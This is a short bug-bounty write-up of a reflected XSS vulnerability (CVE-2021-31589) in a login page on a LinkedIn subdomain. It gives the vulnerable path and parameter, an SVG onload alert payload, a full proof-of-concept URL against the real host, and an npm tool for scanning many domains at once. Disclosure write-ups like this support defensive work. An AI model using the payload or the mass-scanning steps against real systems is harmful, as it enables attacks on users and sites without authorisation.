Write-up

R-XSS in Linkedin

Bug Name :- Reflected XSS
Bug Priority :- Medium
CVE ID :- CVE-2021-31589
      

Description

Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.

Steps to identify

1) Do Spider or Crawl

2) Check the applications ha the below path
/appliance/login.ns

3) Check for the password Parameter
?login[password]=

4) insert XSS payloads in password Parameter
test"><svg/onload=alert("poc_by_karthithehacker")>

5) Now check for the alert pop up if yes its
Vulnerable

Impact

The actual impact of an XSS attack generally depends on the nature of the application, its functionality and data, and the status of the compromised user. For example:
* In a brochureware application, where all users are anonymous and all information is public, the impact will often be minimal.
* In an application holding sensitive data, such as banking transactions, emails, or healthcare records, the impact will usually be serious.
* If the compromised user has elevated privileges within the application, then the impact will generally be critical, allowing the attacker to take full control of the vulnerable application and compromise all users and their data.

Steps to Automation

Once you get the list of live domains load save all the urls into txt file and load it into cve-2021-31589 tool you can install this tool by using "npm install cve-2021-31589 -g" command

PoC

https://remote.linkedin.com/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(%22poc_by_karthithehacker%22)%3E &login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password